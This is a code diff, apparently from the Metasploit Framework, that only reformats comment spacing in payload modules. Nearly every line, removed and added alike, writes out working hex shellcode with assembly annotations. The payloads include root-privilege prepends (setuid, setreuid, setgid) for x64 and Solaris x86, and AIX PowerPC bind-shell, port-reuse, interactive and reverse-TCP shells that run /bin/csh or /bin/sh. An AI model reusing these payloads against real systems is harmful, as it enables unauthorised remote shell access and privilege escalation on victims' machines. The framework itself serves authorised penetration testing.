+             "\x49\x83\xc8\x7f"     + # or r8, 127  (setregid=127)
+             "\x4c\x89\xc0"         + # mov rax, r8
+             "\x48\x31\xff"         + # xor rdi, rdi  0
+             "\x48\x31\xf6"         + # xor rsi, rsi  0
+             "\x0f\x05"               # syscall
     end
 
     if (datastore['PrependSetgid'])
       # setgid(0)
-      pre << "\x41\xb0\x02"         +# mov r8b, 0x2   (Set syscall_class to UNIX=2<<24)
-             "\x49\xc1\xe0\x17"     +# shl r8, 23
-             "\x49\x83\xc8\x5a"     +# or r8, 90  (setgid=181>>1=90)
-             "\x49\xd1\xe0"         +# shl r8, 1
-             "\x49\x83\xc8\x01"     +# or r8, 1 (setgid=181&1=1)
-             "\x4c\x89\xc0"         +# mov rax, r8
-             "\x48\x31\xff"         +# xor rdi, rdi  0
-             "\x0f\x05"             # syscall
+      pre << "\x41\xb0\x02"         + # mov r8b, 0x2   (Set syscall_class to UNIX=2<<24)
+             "\x49\xc1\xe0\x17"     + # shl r8, 23
+             "\x49\x83\xc8\x5a"     + # or r8, 90  (setgid=181>>1=90)
+             "\x49\xd1\xe0"         + # shl r8, 1
+             "\x49\x83\xc8\x01"     + # or r8, 1 (setgid=181&1=1)
+             "\x4c\x89\xc0"         + # mov rax, r8
+             "\x48\x31\xff"         + # xor rdi, rdi  0
+             "\x0f\x05"               # syscall
     end
 
     if (datastore['AppendExit'])
       # exit(0)
-      app << "\x41\xb0\x02"         +# mov r8b, 0x2   (Set syscall_class to UNIX=2<<24)
-             "\x49\xc1\xe0\x18"     +# shl r8, 24
-             "\x49\x83\xc8\x01"     +# or r8, 1  (exit=1)
-             "\x4c\x89\xc0"         +# mov rax, r8
-             "\x48\x31\xff"         +# xor rdi, rdi  0
-             "\x0f\x05"             # syscall
+      app << "\x41\xb0\x02"         + # mov r8b, 0x2   (Set syscall_class to UNIX=2<<24)
+             "\x49\xc1\xe0\x18"     + # shl r8, 24
+             "\x49\x83\xc8\x01"     + # or r8, 1  (exit=1)
+             "\x4c\x89\xc0"         + # mov rax, r8
+             "\x48\x31\xff"         + # xor rdi, rdi  0
+             "\x0f\x05"               # syscall
     end
   end
 

--- a/lib/msf/core/payload/solaris.rb
+++ b/lib/msf/core/payload/solaris.rb
@@ -75,55 +75,55 @@ module Msf::Payload::Solaris
     if (test_arch.include?(ARCH_X86))
 
       # Syscall code
-      sc = "\x68\xff\xd8\xff\x3c" +#   pushl   $0x3cffd8ff                #
-           "\x6a\x65"             +#   pushl   $0x65                      #
-           "\x89\xe6"             +#   movl    %esp,%esi                  #
-           "\xf7\x56\x04"         +#   notl    0x04(%esi)                 #
-           "\xf6\x16"              #   notb    (%esi)                     #
+      sc = "\x68\xff\xd8\xff\x3c" + #   pushl   $0x3cffd8ff                #
+           "\x6a\x65"             + #   pushl   $0x65                      #
+           "\x89\xe6"             + #   movl    %esp,%esi                  #
+           "\xf7\x56\x04"         + #   notl    0x04(%esi)                 #
+           "\xf6\x16"               #   notb    (%esi)                     #
 
       # Prepend
 
       if (datastore['PrependSetreuid'])
         # setreuid(0, 0)
-        pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-               "\x50"                 +#   pushl   %eax                       #
-               "\x50"                 +#   pushl   %eax                       #
-               "\xb0\xca"             +#   movb    $0xca,%al                  #
-               "\xff\xd6"              #   call    *%esi                      #
+        pre << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+               "\x50"                 + #   pushl   %eax                       #
+               "\x50"                 + #   pushl   %eax                       #
+               "\xb0\xca"             + #   movb    $0xca,%al                  #
+               "\xff\xd6"               #   call    *%esi                      #
       end
 
       if (datastore['PrependSetuid'])
         # setuid(0)
-        pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-               "\x50"                 +#   pushl   %eax                       #
-               "\xb0\x17"             +#   movb    $0x17,%al                  #
-               "\xff\xd6"              #   call    *%esi                      #
+        pre << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+               "\x50"                 + #   pushl   %eax                       #
+               "\xb0\x17"             + #   movb    $0x17,%al                  #
+               "\xff\xd6"               #   call    *%esi                      #
       end
 
       if (datastore['PrependSetregid'])
         # setregid(0, 0)
-        pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-               "\x50"                 +#   pushl   %eax                       #
-               "\x50"                 +#   pushl   %eax                       #
-               "\xb0\xcb"             +#   movb    $0xcb,%al                  #
-               "\xff\xd6"              #   call    *%esi                      #
+        pre << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+               "\x50"                 + #   pushl   %eax                       #
+               "\x50"                 + #   pushl   %eax                       #
+               "\xb0\xcb"             + #   movb    $0xcb,%al                  #
+               "\xff\xd6"               #   call    *%esi                      #
       end
 
       if (datastore['PrependSetgid'])
         # setgid(0)
-        pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-               "\x50"                 +#   pushl   %eax                       #
-               "\xb0\x2e"             +#   movb    $0x2e,%al                  #
-               "\xff\xd6"              #   call    *%esi                      #
+        pre << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+               "\x50"                 + #   pushl   %eax                       #
+               "\xb0\x2e"             + #   movb    $0x2e,%al                  #
+               "\xff\xd6"               #   call    *%esi                      #
       end
       # Append
 
       if (datastore['AppendExit'])
         # exit(0)
-        app << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-               "\x50"                 +#   pushl   %eax                       #
-               "\xb0\x01"             +#   movb    $0x01,%al                  #
-               "\xff\xd6"              #   call    *%esi                      #
+        app << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+               "\x50"                 + #   pushl   %eax                       #
+               "\xb0\x01"             + #   movb    $0x01,%al                  #
+               "\xff\xd6"               #   call    *%esi                      #
       end
 
       # Prepend syscall code to prepend block

--- a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb
+++ b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb
@@ -40,70 +40,70 @@ module MetasploitModule
     super(*args)
 
     payload =
-      "\x7f\xff\xfa\x79"     +#   xor.    r31,r31,r31                #
-      "\x40\x82\xff\xfd"     +#   bnel    <bndsockcode>              #
-      "\x7f\xc8\x02\xa6"     +#   mflr    r30                        #
-      "\x3b\xde\x01\xff"     +#   cal     r30,511(r30)               #
-      "\x3b\xde\xfe\x1d"     +#   cal     r30,-483(r30)              #
-      "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-      "\x4e\x80\x04\x20"     +#   bctr                               #
-      "\x4c\xc6\x33\x42"     +#   crorc   6,6,6                      #
-      "\x44\xff\xff\x02"     +#   svca    0                          #
-      "\x3b\xde\xff\xf8"     +#   cal     r30,-8(r30)                #
-      "\x3b\xa0\x07\xff"     +#   lil     r29,2047                   #
-      "\x7c\xa5\x2a\x78"     +#   xor     r5,r5,r5                   #
-      "\x38\x9d\xf8\x02"     +#   cal     r4,-2046(r29)              #
-      "\x38\x7d\xf8\x03"     +#   cal     r3,-2045(r29)              #
+      "\x7f\xff\xfa\x79"     + #   xor.    r31,r31,r31                #
+      "\x40\x82\xff\xfd"     + #   bnel    <bndsockcode>              #
+      "\x7f\xc8\x02\xa6"     + #   mflr    r30                        #
+      "\x3b\xde\x01\xff"     + #   cal     r30,511(r30)               #
+      "\x3b\xde\xfe\x1d"     + #   cal     r30,-483(r30)              #
+      "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+      "\x4e\x80\x04\x20"     + #   bctr                               #
+      "\x4c\xc6\x33\x42"     + #   crorc   6,6,6                      #
+      "\x44\xff\xff\x02"     + #   svca    0                          #
+      "\x3b\xde\xff\xf8"     + #   cal     r30,-8(r30)                #
+      "\x3b\xa0\x07\xff"     + #   lil     r29,2047                   #
+      "\x7c\xa5\x2a\x78"     + #   xor     r5,r5,r5                   #
+      "\x38\x9d\xf8\x02"     + #   cal     r4,-2046(r29)              #
+      "\x38\x7d\xf8\x03"     + #   cal     r3,-2045(r29)              #
       @cal_socket +
-      "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-      "\x4e\x80\x04\x21"     +#   bctrl                              #
-      "\x7c\x7c\x1b\x78"     +#   mr      r28,r3                     #
-      "\x38\xbd\xf8\x11"     +#   cal     r5,-2031(r29)              #
-      "\x3f\x60\xff\x02"     +#   liu     r27,-254                   #
-      "\x63\x7b\x11\x5c"     +#   oril    r27,r27,4444               #
-      "\x97\xe1\xff\xfc"     +#   stu     r31,-4(r1)                 #
-      "\x97\x61\xff\xfc"     +#   stu     r27,-4(r1)                 #
-      "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
+      "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+      "\x4e\x80\x04\x21"     + #   bctrl                              #
+      "\x7c\x7c\x1b\x78"     + #   mr      r28,r3                     #
+      "\x38\xbd\xf8\x11"     + #   cal     r5,-2031(r29)              #
+      "\x3f\x60\xff\x02"     + #   liu     r27,-254                   #
+      "\x63\x7b\x11\x5c"     + #   oril    r27,r27,4444               #
+      "\x97\xe1\xff\xfc"     + #   stu     r31,-4(r1)                 #
+      "\x97\x61\xff\xfc"     + #   stu     r27,-4(r1)                 #
+      "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
       @cal_bind +
-      "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-      "\x4e\x80\x04\x21"     +#   bctrl                              #
-      "\x7c\x84\x22\x78"     +#   xor     r4,r4,r4                   #
-      "\x7f\x83\xe3\x78"     +#   mr      r3,r28                     #
+      "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+      "\x4e\x80\x04\x21"     + #   bctrl                              #
+      "\x7c\x84\x22\x78"     + #   xor     r4,r4,r4                   #
+      "\x7f\x83\xe3\x78"     + #   mr      r3,r28                     #
       @cal_listen +
-      "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-      "\x4e\x80\x04\x21"     +#   bctrl                              #
-      "\x7c\xa5\x2a\x78"     +#   xor     r5,r5,r5                   #
-      "\x7c\x84\x22\x78"     +#   xor     r4,r4,r4                   #
-      "\x7f\x83\xe3\x78"     +#   mr      r3,r28                     #
+      "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+      "\x4e\x80\x04\x21"     + #   bctrl                              #
+      "\x7c\xa5\x2a\x78"     + #   xor     r5,r5,r5                   #
+      "\x7c\x84\x22\x78"     + #   xor     r4,r4,r4                   #
+      "\x7f\x83\xe3\x78"     + #   mr      r3,r28                     #
       @cal_accept +
-      "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-      "\x4e\x80\x04\x21"     +#   bctrl                              #
-      "\x7c\x7a\x1b\x78"     +#   mr      r26,r3                     #
-      "\x3b\x3d\xf8\x03"     +#   cal     r25,-2045(r29)             #
-      "\x7f\x23\xcb\x78"     +#   mr      r3,r25                     #
+      "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+      "\x4e\x80\x04\x21"     + #   bctrl                              #
+      "\x7c\x7a\x1b\x78"     + #   mr      r26,r3                     #
+      "\x3b\x3d\xf8\x03"     + #   cal     r25,-2045(r29)             #
+      "\x7f\x23\xcb\x78"     + #   mr      r3,r25                     #
       @cal_close +
-      "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-      "\x4e\x80\x04\x21"     +#   bctrl                              #
-      "\x7f\x25\xcb\x78"     +#   mr      r5,r25                     #
-      "\x7c\x84\x22\x78"     +#   xor     r4,r4,r4                   #
-      "\x7f\x43\xd3\x78"     +#   mr      r3,r26                     #
+      "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+      "\x4e\x80\x04\x21"     + #   bctrl                              #
+      "\x7f\x25\xcb\x78"     + #   mr      r5,r25                     #
+      "\x7c\x84\x22\x78"     + #   xor     r4,r4,r4                   #
+      "\x7f\x43\xd3\x78"     + #   mr      r3,r26                     #
       @cal_kfcntl +
-      "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-      "\x4e\x80\x04\x21"     +#   bctrl                              #
-      "\x37\x39\xff\xff"     +#   ai.     r25,r25,-1                 #
-      "\x40\x80\xff\xd4"     +#   bge     <bndsockcode+160>          #
-      "\x7c\xa5\x2a\x79"     +#   xor.    r5,r5,r5                   #
-      "\x40\x82\xff\xfd"     +#   bnel    <bndsockcode+208>          #
-      "\x7f\x08\x02\xa6"     +#   mflr    r24                        #
-      "\x3b\x18\x01\xff"     +#   cal     r24,511(r24)               #
-      "\x38\x78\xfe\x29"     +#   cal     r3,-471(r24)               #
-      "\x98\xb8\xfe\x31"     +#   stb     r5,-463(r24)               #
-      "\x94\xa1\xff\xfc"     +#   stu     r5,-4(r1)                  #
-      "\x94\x61\xff\xfc"     +#   stu     r3,-4(r1)                  #
-      "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
+      "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+      "\x4e\x80\x04\x21"     + #   bctrl                              #
+      "\x37\x39\xff\xff"     + #   ai.     r25,r25,-1                 #
+      "\x40\x80\xff\xd4"     + #   bge     <bndsockcode+160>          #
+      "\x7c\xa5\x2a\x79"     + #   xor.    r5,r5,r5                   #
+      "\x40\x82\xff\xfd"     + #   bnel    <bndsockcode+208>          #
+      "\x7f\x08\x02\xa6"     + #   mflr    r24                        #
+      "\x3b\x18\x01\xff"     + #   cal     r24,511(r24)               #
+      "\x38\x78\xfe\x29"     + #   cal     r3,-471(r24)               #
+      "\x98\xb8\xfe\x31"     + #   stb     r5,-463(r24)               #
+      "\x94\xa1\xff\xfc"     + #   stu     r5,-4(r1)                  #
+      "\x94\x61\xff\xfc"     + #   stu     r3,-4(r1)                  #
+      "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
       @cal_execve +
-      "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-      "\x4e\x80\x04\x21"     +#   bctrl                              #
+      "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+      "\x4e\x80\x04\x21"     + #   bctrl                              #
       "/bin/csh"
 
       # If the payload is generated and there are offsets to substitute,

--- a/modules/payloads/singles/aix/ppc/shell_find_port.rb
+++ b/modules/payloads/singles/aix/ppc/shell_find_port.rb
@@ -40,59 +40,59 @@ module MetasploitModule
     super(*args)
 
     payload =
-    "\x7f\xff\xfa\x79"     +#   xor.    r31,r31,r31                #
-    "\x40\x82\xff\xfd"     +#   bnel    <fndsockcode>              #
-    "\x7f\xc8\x02\xa6"     +#   mflr    r30                        #
-    "\x3b\xde\x01\xff"     +#   cal     r30,511(r30)               #
-    "\x3b\xde\xfe\x1d"     +#   cal     r30,-483(r30)              #
-    "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-    "\x4e\x80\x04\x20"     +#   bctr                               #
-    "\x4c\xc6\x33\x42"     +#   crorc   6,6,6                      #
-    "\x44\xff\xff\x02"     +#   svca    0                          #
-    "\x3b\xde\xff\xf8"     +#   cal     r30,-8(r30)                #
-    "\x3b\xa0\x07\xff"     +#   lil     r29,2047                   #
-    "\x97\xe1\xff\xfc"     +#   stu     r31,-4(r1)                 #
-    "\x7c\x3c\x0b\x78"     +#   mr      r28,r1                     #
-    "\x3b\x7d\xf8\x2d"     +#   cal     r27,-2003(r29)             #
-    "\x97\x61\xff\xfc"     +#   stu     r27,-4(r1)                 #
-    "\x7c\x3b\x0b\x78"     +#   mr      r27,r1                     #
-    "\x3b\xff\x01\xff"     +#   cal     r31,511(r31)               #
-    "\x3b\xff\xfe\x02"     +#   cal     r31,-510(r31)              #
-    "\x7f\x65\xdb\x78"     +#   mr      r5,r27                     #
-    "\x7f\x84\xe3\x78"     +#   mr      r4,r28                     #
-    "\x7f\xe3\xfb\x78"     +#   mr      r3,r31                     #
+    "\x7f\xff\xfa\x79"     + #   xor.    r31,r31,r31                #
+    "\x40\x82\xff\xfd"     + #   bnel    <fndsockcode>              #
+    "\x7f\xc8\x02\xa6"     + #   mflr    r30                        #
+    "\x3b\xde\x01\xff"     + #   cal     r30,511(r30)               #
+    "\x3b\xde\xfe\x1d"     + #   cal     r30,-483(r30)              #
+    "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+    "\x4e\x80\x04\x20"     + #   bctr                               #
+    "\x4c\xc6\x33\x42"     + #   crorc   6,6,6                      #
+    "\x44\xff\xff\x02"     + #   svca    0                          #
+    "\x3b\xde\xff\xf8"     + #   cal     r30,-8(r30)                #
+    "\x3b\xa0\x07\xff"     + #   lil     r29,2047                   #
+    "\x97\xe1\xff\xfc"     + #   stu     r31,-4(r1)                 #
+    "\x7c\x3c\x0b\x78"     + #   mr      r28,r1                     #
+    "\x3b\x7d\xf8\x2d"     + #   cal     r27,-2003(r29)             #
+    "\x97\x61\xff\xfc"     + #   stu     r27,-4(r1)                 #
+    "\x7c\x3b\x0b\x78"     + #   mr      r27,r1                     #
+    "\x3b\xff\x01\xff"     + #   cal     r31,511(r31)               #
+    "\x3b\xff\xfe\x02"     + #   cal     r31,-510(r31)              #
+    "\x7f\x65\xdb\x78"     + #   mr      r5,r27                     #
+    "\x7f\x84\xe3\x78"     + #   mr      r4,r28                     #
+    "\x7f\xe3\xfb\x78"     + #   mr      r3,r31                     #
     @cal_getpeername +
-    "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-    "\x4e\x80\x04\x21"     +#   bctrl                              #
-    "\x3b\x5c\x01\xff"     +#   cal     r26,511(r28)               #
-    "\xa3\x5a\xfe\x03"     +#   lhz     r26,-509(r26)              #
-    "\x28\x1a\x11\x5c"     +#   cmpli   0,r26,4444                 #
-    "\x40\x82\xff\xd4"     +#   bne     <fndsockcode+64>           #
-    "\x3b\x3d\xf8\x03"     +#   cal     r25,-2045(r29)             #
-    "\x7f\x23\xcb\x78"     +#   mr      r3,r25                     #
+    "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+    "\x4e\x80\x04\x21"     + #   bctrl                              #
+    "\x3b\x5c\x01\xff"     + #   cal     r26,511(r28)               #
+    "\xa3\x5a\xfe\x03"     + #   lhz     r26,-509(r26)              #
+    "\x28\x1a\x11\x5c"     + #   cmpli   0,r26,4444                 #
+    "\x40\x82\xff\xd4"     + #   bne     <fndsockcode+64>           #
+    "\x3b\x3d\xf8\x03"     + #   cal     r25,-2045(r29)             #
+    "\x7f\x23\xcb\x78"     + #   mr      r3,r25                     #
     @cal_close +
-    "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-    "\x4e\x80\x04\x21"     +#   bctrl                              #
-    "\x7f\x25\xcb\x78"     +#   mr      r5,r25                     #
-    "\x7c\x84\x22\x78"     +#   xor     r4,r4,r4                   #
-    "\x7f\xe3\xfb\x78"     +#   mr      r3,r31                     #
+    "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+    "\x4e\x80\x04\x21"     + #   bctrl                              #
+    "\x7f\x25\xcb\x78"     + #   mr      r5,r25                     #
+    "\x7c\x84\x22\x78"     + #   xor     r4,r4,r4                   #
+    "\x7f\xe3\xfb\x78"     + #   mr      r3,r31                     #
     @cal_kfcntl +
-    "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-    "\x4e\x80\x04\x21"     +#   bctrl                              #
-    "\x37\x39\xff\xff"     +#   ai.     r25,r25,-1                 #
-    "\x40\x80\xff\xd4"     +#   bge     <fndsockcode+116>          #
-    "\x7c\xa5\x2a\x79"     +#   xor.    r5,r5,r5                   #
-    "\x40\x82\xff\xfd"     +#   bnel    <fndsockcode+164>          #
-    "\x7f\x08\x02\xa6"     +#   mflr    r24                        #
-    "\x3b\x18\x01\xff"     +#   cal     r24,511(r24)               #
-    "\x38\x78\xfe\x29"     +#   cal     r3,-471(r24)               #
-    "\x98\xb8\xfe\x31"     +#   stb     r5,-463(r24)               #
-    "\x94\xa1\xff\xfc"     +#   stu     r5,-4(r1)                  #
-    "\x94\x61\xff\xfc"     +#   stu     r3,-4(r1)                  #
-    "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
+    "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+    "\x4e\x80\x04\x21"     + #   bctrl                              #
+    "\x37\x39\xff\xff"     + #   ai.     r25,r25,-1                 #
+    "\x40\x80\xff\xd4"     + #   bge     <fndsockcode+116>          #
+    "\x7c\xa5\x2a\x79"     + #   xor.    r5,r5,r5                   #
+    "\x40\x82\xff\xfd"     + #   bnel    <fndsockcode+164>          #
+    "\x7f\x08\x02\xa6"     + #   mflr    r24                        #
+    "\x3b\x18\x01\xff"     + #   cal     r24,511(r24)               #
+    "\x38\x78\xfe\x29"     + #   cal     r3,-471(r24)               #
+    "\x98\xb8\xfe\x31"     + #   stb     r5,-463(r24)               #
+    "\x94\xa1\xff\xfc"     + #   stu     r5,-4(r1)                  #
+    "\x94\x61\xff\xfc"     + #   stu     r3,-4(r1)                  #
+    "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
     @cal_execve +
-    "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-    "\x4e\x80\x04\x21"     +#   bctrl                              #
+    "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+    "\x4e\x80\x04\x21"     + #   bctrl                              #
     "/bin/csh"
 
     # If the payload is generated and there are offsets to substitute,

--- a/modules/payloads/singles/aix/ppc/shell_interact.rb
+++ b/modules/payloads/singles/aix/ppc/shell_interact.rb
@@ -34,18 +34,18 @@ module MetasploitModule
     super(*args)
 
     payload =
-      "\x7c\xa5\x2a\x79"     +# /* xor.    r5,r5,r5             */
-      "\x40\x82\xff\xfd"     +# /* bnel    <shellcode>          */
-      "\x7f\xe8\x02\xa6"     +# /* mflr    r31                  */
-      "\x3b\xff\x01\x20"     +# /* cal     r31,0x120(r31)       */
-      "\x38\x7f\xff\x08"     +# /* cal     r3,-248(r31)         */
-      "\x38\x9f\xff\x10"     +# /* cal     r4,-240(r31)         */
-      "\x90\x7f\xff\x10"     +# /* st      r3,-240(r31)         */
-      "\x90\xbf\xff\x14"     +# /* st      r5,-236(r31)         */
-      "\x88\x5f\xff\x0f"     +# /* lbz     r2,-241(r31)         */
-      "\x98\xbf\xff\x0f"     +# /* stb     r5,-241(r31)         */
-      "\x4c\xc6\x33\x42"     +# /* crorc   cr6,cr6,cr6          */
-      "\x44\xff\xff\x02"     +# /* svca                         */
+      "\x7c\xa5\x2a\x79"     + # /* xor.    r5,r5,r5             */
+      "\x40\x82\xff\xfd"     + # /* bnel    <shellcode>          */
+      "\x7f\xe8\x02\xa6"     + # /* mflr    r31                  */
+      "\x3b\xff\x01\x20"     + # /* cal     r31,0x120(r31)       */
+      "\x38\x7f\xff\x08"     + # /* cal     r3,-248(r31)         */
+      "\x38\x9f\xff\x10"     + # /* cal     r4,-240(r31)         */
+      "\x90\x7f\xff\x10"     + # /* st      r3,-240(r31)         */
+      "\x90\xbf\xff\x14"     + # /* st      r5,-236(r31)         */
+      "\x88\x5f\xff\x0f"     + # /* lbz     r2,-241(r31)         */
+      "\x98\xbf\xff\x0f"     + # /* stb     r5,-241(r31)         */
+      "\x4c\xc6\x33\x42"     + # /* crorc   cr6,cr6,cr6          */
+      "\x44\xff\xff\x02"     + # /* svca                         */
       "/bin/sh"+
       "\x05"
 

--- a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb
@@ -41,55 +41,55 @@ module MetasploitModule
     super(*args)
 
     payload =
-    "\x7c\xa5\x2a\x79"     +#   xor.    r5,r5,r5                   #
-    "\x40\x82\xff\xfd"     +#   bnel    <cntsockcode>              #
-    "\x7f\xc8\x02\xa6"     +#   mflr    r30                        #
-    "\x3b\xde\x01\xff"     +#   cal     r30,511(r30)               #
-    "\x3b\xde\xfe\x25"     +#   cal     r30,-475(r30)              #
-    "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-    "\x4e\x80\x04\x20"     +#   bctr                               #
-    "\xff\x02\x11\x5c"     +#   .long   0xff02115c                 #
-    "\x7f\x00\x00\x01"     +#   .long   0x7f000001                 #
-    "\x4c\xc6\x33\x42"     +#   crorc   6,6,6                      #
-    "\x44\xff\xff\x02"     +#   svca    0                          #
-    "\x3b\xde\xff\xf8"     +#   cal     r30,-8(r30)                #
-    "\x3b\xa0\x07\xff"     +#   lil     r29,2047                   #
-    "\x38\x9d\xf8\x02"     +#   cal     r4,-2046(r29)              #
-    "\x38\x7d\xf8\x03"     +#   cal     r3,-2045(r29)              #
+    "\x7c\xa5\x2a\x79"     + #   xor.    r5,r5,r5                   #
+    "\x40\x82\xff\xfd"     + #   bnel    <cntsockcode>              #
+    "\x7f\xc8\x02\xa6"     + #   mflr    r30                        #
+    "\x3b\xde\x01\xff"     + #   cal     r30,511(r30)               #
+    "\x3b\xde\xfe\x25"     + #   cal     r30,-475(r30)              #
+    "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+    "\x4e\x80\x04\x20"     + #   bctr                               #
+    "\xff\x02\x11\x5c"     + #   .long   0xff02115c                 #
+    "\x7f\x00\x00\x01"     + #   .long   0x7f000001                 #
+    "\x4c\xc6\x33\x42"     + #   crorc   6,6,6                      #
+    "\x44\xff\xff\x02"     + #   svca    0                          #
+    "\x3b\xde\xff\xf8"     + #   cal     r30,-8(r30)                #
+    "\x3b\xa0\x07\xff"     + #   lil     r29,2047                   #
+    "\x38\x9d\xf8\x02"     + #   cal     r4,-2046(r29)              #
+    "\x38\x7d\xf8\x03"     + #   cal     r3,-2045(r29)              #
     @cal_socket +
-    "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-    "\x4e\x80\x04\x21"     +#   bctrl                              #
-    "\x7c\x7c\x1b\x78"     +#   mr      r28,r3                     #
-    "\x38\xbd\xf8\x11"     +#   cal     r5,-2031(r29)              #
-    "\x38\x9e\xff\xf8"     +#   cal     r4,-8(r30)                 #
+    "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+    "\x4e\x80\x04\x21"     + #   bctrl                              #
+    "\x7c\x7c\x1b\x78"     + #   mr      r28,r3                     #
+    "\x38\xbd\xf8\x11"     + #   cal     r5,-2031(r29)              #
+    "\x38\x9e\xff\xf8"     + #   cal     r4,-8(r30)                 #
     @cal_connect +
-    "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-    "\x4e\x80\x04\x21"     +#   bctrl                              #
-    "\x3b\x7d\xf8\x03"     +#   cal     r27,-2045(r29)             #
-    "\x7f\x63\xdb\x78"     +#   mr      r3,r27                     #
+    "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+    "\x4e\x80\x04\x21"     + #   bctrl                              #
+    "\x3b\x7d\xf8\x03"     + #   cal     r27,-2045(r29)             #
+    "\x7f\x63\xdb\x78"     + #   mr      r3,r27                     #
     @cal_close +
-    "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-    "\x4e\x80\x04\x21"     +#   bctrl                              #
-    "\x7f\x65\xdb\x78"     +#   mr      r5,r27                     #
-    "\x7c\x84\x22\x78"     +#   xor     r4,r4,r4                   #
-    "\x7f\x83\xe3\x78"     +#   mr      r3,r28                     #
+    "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+    "\x4e\x80\x04\x21"     + #   bctrl                              #
+    "\x7f\x65\xdb\x78"     + #   mr      r5,r27                     #
+    "\x7c\x84\x22\x78"     + #   xor     r4,r4,r4                   #
+    "\x7f\x83\xe3\x78"     + #   mr      r3,r28                     #
     @cal_kfcntl +
-    "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-    "\x4e\x80\x04\x21"     +#   bctrl                              #
-    "\x37\x7b\xff\xff"     +#   ai.     r27,r27,-1                 #
-    "\x40\x80\xff\xd4"     +#   bge     <cntsockcode+100>          #
-    "\x7c\xa5\x2a\x79"     +#   xor.    r5,r5,r5                   #
-    "\x40\x82\xff\xfd"     +#   bnel    <cntsockcode+148>          #
-    "\x7f\x08\x02\xa6"     +#   mflr    r24                        #
-    "\x3b\x18\x01\xff"     +#   cal     r24,511(r24)               #
-    "\x38\x78\xfe\x29"     +#   cal     r3,-471(r24)               #
-    "\x98\xb8\xfe\x31"     +#   stb     r5,-463(r24)               #
-    "\x94\xa1\xff\xfc"     +#   stu     r5,-4(r1)                  #
-    "\x94\x61\xff\xfc"     +#   stu     r3,-4(r1)                  #
-    "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
+    "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+    "\x4e\x80\x04\x21"     + #   bctrl                              #
+    "\x37\x7b\xff\xff"     + #   ai.     r27,r27,-1                 #
+    "\x40\x80\xff\xd4"     + #   bge     <cntsockcode+100>          #
+    "\x7c\xa5\x2a\x79"     + #   xor.    r5,r5,r5                   #
+    "\x40\x82\xff\xfd"     + #   bnel    <cntsockcode+148>          #
+    "\x7f\x08\x02\xa6"     + #   mflr    r24                        #
+    "\x3b\x18\x01\xff"     + #   cal     r24,511(r24)               #
+    "\x38\x78\xfe\x29"     + #   cal     r3,-471(r24)               #
+    "\x98\xb8\xfe\x31"     + #   stb     r5,-463(r24)               #
+    "\x94\xa1\xff\xfc"     + #   stu     r5,-4(r1)                  #
+    "\x94\x61\xff\xfc"     + #   stu     r3,-4(r1)                  #
+    "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
     @cal_execve +
-    "\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
-    "\x4e\x80\x04\x21"     +#   bctrl                              #
+    "\x7f\xc9\x03\xa6"     + #   mtctr   r30                        #
+    "\x4e\x80\x04\x21"     + #   bctrl                              #
     "/bin/csh"
 
     # If the payload is generated and there are offsets to substitute,

--- a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
@@ -33,52 +33,52 @@ module MetasploitModule
               'LPORT'    => [ 20, 'n' ],
             },
